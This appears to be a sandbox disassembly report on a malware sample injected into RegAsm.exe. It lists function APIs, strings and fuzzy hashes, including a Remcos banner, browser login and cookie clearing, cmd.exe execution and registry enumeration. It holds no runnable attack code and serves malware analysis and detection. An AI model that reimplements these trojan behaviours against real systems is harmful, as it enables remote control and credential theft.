Opcode ID: 0b3a1dac5053e1b5517043d79c7fa65b2ae551102c5e8ab644283b35d32d8611
Instruction ID: 4dd5d21ea278282282332d3fbbd4e75003fae811a8332383d903c8233eb77b47
Opcode Fuzzy Hash: 0b3a1dac5053e1b5517043d79c7fa65b2ae551102c5e8ab644283b35d32d8611
Instruction Fuzzy Hash: 27F0F6719047017FDB103BB59E0E96A7F98BB07715F00057FF881912E2D6B9C81097AA

Function 004134D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00413507
PlaySoundW.WINMM(00000000,00000000), ref: 00413515
Sleep.KERNEL32(00002710), ref: 0041351C
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00413525

Strings

Alarm triggered, xrefs: 004134DE

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 9e9efe8d9f78683617940ca8831c71fd8772039a7a58f0b62664b3eb38fdf63e
Instruction ID: dd9dd7169c3b2ad8cb57031a818ea50ccae587d830f3c19570e6bdd98110ca0d
Opcode Fuzzy Hash: 9e9efe8d9f78683617940ca8831c71fd8772039a7a58f0b62664b3eb38fdf63e
Instruction Fuzzy Hash: C0E01236F44110779520376AAD0FC6F2E28DAC7B55742006FFA05571929D94081586FB

Function 004150E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 004150EF
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 004150FC
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 00415109
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041517C,?,?,?,00000000,771B0F10), ref: 0041511C

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041510F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: bbb74496a4c79a37813c7393ec51be51440fa8f1a05f7dd19656b9a2878a2a6b
Instruction ID: 51ccb5ed899ab14f6f5ebcdeb72e3bd2cd834a6bdf3d7eb62036f2204a89400a
Opcode Fuzzy Hash: bbb74496a4c79a37813c7393ec51be51440fa8f1a05f7dd19656b9a2878a2a6b
Instruction Fuzzy Hash: 5FE048B694420877D6102BA5AC4FC6F7B6CE78EA13B100666FE1191193D97454054675

Function 0043501A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6933eeb3a564efde60f8a3cbfdfe6a07109f1c1f134dab525f5f077ad61f83e
Instruction ID: fc7f4a77169b4a8b503a3be5dc3e722b80489ba004f86df33c611c31e43807f2
Opcode Fuzzy Hash: b6933eeb3a564efde60f8a3cbfdfe6a07109f1c1f134dab525f5f077ad61f83e
Instruction Fuzzy Hash: C971C331900A169BDF21CF98C8846BFBB75FF4A350F2452ABE81167291D7748D41CFA9

Function 0043A3C9 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B

_free.LIBCMT ref: 0043A4D4
_free.LIBCMT ref: 0043A4EB
_free.LIBCMT ref: 0043A50A
_free.LIBCMT ref: 0043A525
_free.LIBCMT ref: 0043A53C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 09cb3000bdfd736a432031ce544d16843c92cda7aca7540ef4c5094365ada1d5
Instruction ID: 0626f0b1727110b16f7d8c70f251855ad8de191a426444a56e789b4bc756c451
Opcode Fuzzy Hash: 09cb3000bdfd736a432031ce544d16843c92cda7aca7540ef4c5094365ada1d5
Instruction Fuzzy Hash: E751C031A40304AFDB20DF2ACC41B6A77F4EF58724F14556EE989D7260E739E9118B8A

Function 004394E6 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439558
_free.LIBCMT ref: 00439578

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a7f7c3244b323182d98a37bfe86edf306979d698ca324a6fa4207deaa86ae4c7
Instruction ID: c8c874e976f7f9d1c30b15fed1f39afc58c2ac3c026be4347813588923dff435
Opcode Fuzzy Hash: a7f7c3244b323182d98a37bfe86edf306979d698ca324a6fa4207deaa86ae4c7
Instruction Fuzzy Hash: 06410633A00210AFCB24DF78C981A5EB3E5EF88314F15416AE915EB351EB75ED01CB84

Function 0044333D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043339C,?,00000000,?,00000001,?,?,00000001,0043339C,?), ref: 0044338A
__alloca_probe_16.LIBCMT ref: 004433C2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00443413
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004326CA,?), ref: 00443425
__freea.LIBCMT ref: 0044342E

Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 6eb7861f347f817c00430624536bc715ee2982cc1f153a22f7f50fc61c548a3e
Instruction ID: 613b810780fe4859688c941d2bbeff8913d35e1692fb54097f553fc103df8f50
Opcode Fuzzy Hash: 6eb7861f347f817c00430624536bc715ee2982cc1f153a22f7f50fc61c548a3e
Instruction Fuzzy Hash: 55310E72A0020AABEF259F65DC81DEF7BA5EB01B11F04016AFC14D6290EB39CE50CB94

Function 0044153A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00441543
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00441566

Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044158C
_free.LIBCMT ref: 0044159F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004415AE

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 3f673537a057b7c5c2119dac0621aa7296225df49b06fea26182794cdd4a5da7
Instruction ID: 0b963310433ed909f4298f7bed4582eea210cd486c0a534cbd05f872a17047ef
Opcode Fuzzy Hash: 3f673537a057b7c5c2119dac0621aa7296225df49b06fea26182794cdd4a5da7
Instruction Fuzzy Hash: 6901D476A126157F332117B75C48CFB6A6CDAC7BA4314016FFE06C2250DA79CD4282B9

Function 00442BCD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00442BE5

Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD

_free.LIBCMT ref: 00442BF7
_free.LIBCMT ref: 00442C09
_free.LIBCMT ref: 00442C1B
_free.LIBCMT ref: 00442C2D

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3f9f08003b5c9c9a5bf46649090cab361abca7511720b0b259fe0dc2dd66b9e8
Instruction ID: 955dd411307ab1f53dee283ea2c46591a2e1c5327ced68c2c30979c1e126fd0a
Opcode Fuzzy Hash: 3f9f08003b5c9c9a5bf46649090cab361abca7511720b0b259fe0dc2dd66b9e8
Instruction Fuzzy Hash: 8DF062328082046BDA20DBA9FAC6D9B73E9EA853107941C1BF514D7740DBB8FCC047AC

Function 00439735 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439753

Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD

_free.LIBCMT ref: 00439765
_free.LIBCMT ref: 00439778
_free.LIBCMT ref: 00439789
_free.LIBCMT ref: 0043979A

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 655d0cb59529f7d7d04c2457ca09dbe4e30996ce2a5c49b87689d855b4d02f27
Instruction ID: 9ef463557e41da891acb4cd30ea69058f6d3186d2e22c24e8b27c7661cd970de
Opcode Fuzzy Hash: 655d0cb59529f7d7d04c2457ca09dbe4e30996ce2a5c49b87689d855b4d02f27
Instruction Fuzzy Hash: D3F030B4816A51CBCA45BF28BC425553BE0E74E734B10112BF62457371F7B808698FDE

Function 0040D476 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0040D5AC

Strings

[regsplt], xrefs: 0040D638

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 299435e720278571778f3d00cc16747858d4a0d779c63fa98d5ee3cc663ccbcb
Instruction ID: cec7730470a505a3256cfe8bef0cb683ba61c19b7add015e1d9d78f1a423faa4
Opcode Fuzzy Hash: 299435e720278571778f3d00cc16747858d4a0d779c63fa98d5ee3cc663ccbcb
Instruction Fuzzy Hash: 90513D71900219AADB11EBE1DC96EEFB77CAF04304F10017AF605B2191EF786B49CB69

Function 004408C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 00440918
_free.LIBCMT ref: 00440A35

Part of subcall function 004322E3: IsProcessorFeaturePresent.KERNEL32(00000017,004322B5,00000000,00000000,00467F30,00000000,00000000,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000), ref: 004322E5
Part of subcall function 004322E3: GetCurrentProcess.KERNEL32(C0000417), ref: 00432307
Part of subcall function 004322E3: TerminateProcess.KERNEL32(00000000), ref: 0043230E

Strings

., xrefs: 00440BEC
*?, xrefs: 0044090C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 4a7c3074ab91a6a01bd22ae712e580e20d2211959bea24d4d8b343864066331e
Instruction ID: 650f7b95baa2f55995b2d66d03bab482663cf2eccb6ced69fa93d6f4d14c5d84
Opcode Fuzzy Hash: 4a7c3074ab91a6a01bd22ae712e580e20d2211959bea24d4d8b343864066331e
Instruction Fuzzy Hash: C551D371E002099FEF14CFA9C881AAEF7B5EF58314F24416EE644E7301E6399E11CB54

Function 00437E45 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437F9E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00437FB3

Strings

~C, xrefs: 00437FAD
~C, xrefs: 00437EC0

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: ~C$ ~C
API String ID: 885266447-903778833
Opcode ID: f3377a5bd023bbef2fe2ae2b30aa26cd788dc34504c359889b9b0d8bb5d82794
Instruction ID: 5e0205a4890506e29233cee9db7b7ce387702eeec4fe8001aee1c665518b7736
Opcode Fuzzy Hash: f3377a5bd023bbef2fe2ae2b30aa26cd788dc34504c359889b9b0d8bb5d82794
Instruction Fuzzy Hash: 00519EB1A04149AFCF24CF59C880AAEBBB2FF88364F18919AE85897361D734DD01CB44

Function 00438B03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00438B43
_free.LIBCMT ref: 00438C0E
_free.LIBCMT ref: 00438C18

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00438B3A, 00438B41, 00438B70, 00438BA8

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 2506810119-1068371695
Opcode ID: 38ec7074c0d385567f6a8a54c7fc026edc3d677d5918b93ce9d379eecf3cd1cf
Instruction ID: 8871a02dc71d87ae79a0c8c1142e0f43972f8d7c07d3df44b28c0f215ac531c3
Opcode Fuzzy Hash: 38ec7074c0d385567f6a8a54c7fc026edc3d677d5918b93ce9d379eecf3cd1cf
Instruction Fuzzy Hash: 8031A0B1A01319ABDB21DB998C8199FFBBCEB89314F1050ABF90497311DA789E44CB59

Function 00401F7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00401F7A), ref: 00401F96
CloseHandle.KERNEL32(?), ref: 00401FED
SetEvent.KERNEL32(?), ref: 00401FFC

Strings

Connection Timeout, xrefs: 00401FBB

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 22daf8a8d436f8a122d6a1ead30463ab912d28da8f0d32497673add79ba29cff
Instruction ID: 53294a7de4bdb51bce9aa9965701b23816d0540fe960ce4e3515f9f1b139e479
Opcode Fuzzy Hash: 22daf8a8d436f8a122d6a1ead30463ab912d28da8f0d32497673add79ba29cff
Instruction Fuzzy Hash: BA012831A44B01AFD7216B768C8582A7BE1BF01305700097FE583526B1D7789400D759

Function 00409FC3 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040A031

Strings

ios_base::badbit set, xrefs: 00409FED
ios_base::failbit set, xrefs: 0040A013
ios_base::eofbit set, xrefs: 0040A020

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: a16eb189537a9ed1daadcd7a1abf2371948385d40a6e50c78772150a9fcb57ac
Instruction ID: cb096aa3a16b0a6b94bda36ceb80c3fc8b27b60b13b52bc6373e390451181ed5
Opcode Fuzzy Hash: a16eb189537a9ed1daadcd7a1abf2371948385d40a6e50c78772150a9fcb57ac
Instruction Fuzzy Hash: FE01DB7164030CAAEB10EA51C853FBA73685B0030AF20802BB906B50C3EA7C6C56862F

Function 0040F7EC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0040F82E

Strings

open, xrefs: 0040F828
/C , xrefs: 0040F80C
cmd.exe, xrefs: 0040F823

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 0517a6e350017178d7da968cd89f9d0731610964a3cb4c9304e982b3f393945e
Instruction ID: b9b5919498ba485fb8f6930109a7034d9cba9b0480c4b6652f0920fc7d9d687c
Opcode Fuzzy Hash: 0517a6e350017178d7da968cd89f9d0731610964a3cb4c9304e982b3f393945e
Instruction Fuzzy Hash: D7F062311082016AC215FB22D8569BFB7A9ABD1705F00483FB546A20D2EF7C5A4ED61E

Function 0040D0A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,771B0F10), ref: 0040D0CE
RegQueryValueExW.ADVAPI32(?,del,00000000,00000000,?,00000400), ref: 0040D0EF
RegCloseKey.ADVAPI32(?), ref: 0040D0F8

Strings

del, xrefs: 0040D0E7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: del
API String ID: 3677997916-3960539263
Opcode ID: 15ee1c042502c26f0a9d7c707821b894e9a3c11a1fe5eb1c0ec339c937e139aa
Instruction ID: c18f750833c3ba39f056a91a96db6080338cdd2eaf1d6b7373ff174bee547806
Opcode Fuzzy Hash: 15ee1c042502c26f0a9d7c707821b894e9a3c11a1fe5eb1c0ec339c937e139aa
Instruction Fuzzy Hash: 13F0C275A00218FBDB109B90DC06FDD7B7CEB04705F2040A2BA00B6191DBB46E488BDC

Function 004012F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004012FF
GetProcAddress.KERNEL32(00000000), ref: 00401306

Strings

User32.dll, xrefs: 004012FA
GetCursorInfo, xrefs: 004012F5

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 3dee1189c0240d0f0416ca2e92eeb43590600ab21297a5382e44dffafad0fdfa
Instruction ID: 7a1079c1b55b5e409d7bab262d9c77c56b6c484de43da482ee61ffea879d2a08
Opcode Fuzzy Hash: 3dee1189c0240d0f0416ca2e92eeb43590600ab21297a5382e44dffafad0fdfa
Instruction Fuzzy Hash: D6B09BB4D41700D7C7141BF1DC0D54936649505B07B104135F84583191DAB8044E4F1E

Function 0040139A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004013A4
GetProcAddress.KERNEL32(00000000), ref: 004013AB

Strings

GetLastInputInfo, xrefs: 0040139A
User32.dll, xrefs: 0040139F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: c5fb56e5a78a3533fa0d5b6a0febd18a97217f8413de963d1376cbb78f04768d
Instruction ID: 7060e6096a3b0cf119f91b7b5660e64d53dcedb2c7a0492c07f29decda4d72cf
Opcode Fuzzy Hash: c5fb56e5a78a3533fa0d5b6a0febd18a97217f8413de963d1376cbb78f04768d
Instruction Fuzzy Hash: 15B09BB8941300D787542FF0AD0D9053A65D505B17F100479F855C3192DA75004D465F

Function 0044A124 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044A253

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b18d1eae1c5a4d1db04201d67f61c7d8a9830629fc6e21fb6dc69ff2acbd87ce
Instruction ID: 02328b9a0def9105c60072ac53d4c6597c74db7361cec4947c3cfec5fa8f093c
Opcode Fuzzy Hash: b18d1eae1c5a4d1db04201d67f61c7d8a9830629fc6e21fb6dc69ff2acbd87ce
Instruction Fuzzy Hash: 4B414E31A401006BEB216FBA8C46AAF3664FF8E374F14019BF428D63D1E67D5821566F

Function 004382C1 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee3318f8fd3b27a0ba7235ece3f8e980255d41cd4d0c8bc1ed6760f0479b9af
Instruction ID: 87f12df7f4bff9a267f7e33f5d575456b8aa141ba8f1907d633ac3855509fe08
Opcode Fuzzy Hash: 5ee3318f8fd3b27a0ba7235ece3f8e980255d41cd4d0c8bc1ed6760f0479b9af
Instruction Fuzzy Hash: A0412871A00704AFE7249F78CC01BABFBA4EB8C714F10916FF551DB781DA7AA9018788

Function 00401AEF Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,?), ref: 00401BDC
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00401BEF
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00401AC2,00000000,?,?,?,00000000,00000000), ref: 00401BFA
CloseHandle.KERNEL32(?,?,?,?,?,?,00401AC2,00000000,?,?,?,00000000,00000000), ref: 00401C03

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 1a05e6145b27f50bb154a03b2d11e99ccd4f2700f904e895199355e0e1e46a25
Instruction ID: 4c3b87f8b26e421484a5416da664749deae10a416ef7c933f3c1033e637f22ec
Opcode Fuzzy Hash: 1a05e6145b27f50bb154a03b2d11e99ccd4f2700f904e895199355e0e1e46a25
Instruction Fuzzy Hash: E2417171A00318ABDF11EBA1CD459EEB7BDAF14328F04012AF552B32D1DB78A905C764

Function 004084F3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00408508
Sleep.KERNEL32(00001388), ref: 00408590

Strings

Cleared browsers logins and cookies., xrefs: 004085DC
[Cleared browsers logins and cookies.], xrefs: 004085CB

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 452e1f69e07f2b35f07518ea0e5366825a7b19e844b8edba28d87f063262b39e
Instruction ID: 1367f80d1a5ae34b59ca1da1382871fc212a19866b6e8415878d7c7997fe6198
Opcode Fuzzy Hash: 452e1f69e07f2b35f07518ea0e5366825a7b19e844b8edba28d87f063262b39e
Instruction Fuzzy Hash: 8431A21464C381BAC61167B51E567AB7B920B93758F09487FE8C42B3C3DDBA4809936F

Function 00439101 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325862a9a00d25f4d929253fa3ce3015215c40d1867eeb9a88d787a8619438f4
Instruction ID: 579b40c2be03176720b1ab7dfba76c3c7b2672f3b9e2c73a2f16070f8600f84a
Opcode Fuzzy Hash: 325862a9a00d25f4d929253fa3ce3015215c40d1867eeb9a88d787a8619438f4
Instruction Fuzzy Hash: 50018FB26096173EFA211A786CC5F67235DDB493B8F20232AF532652D5DAB88C014269

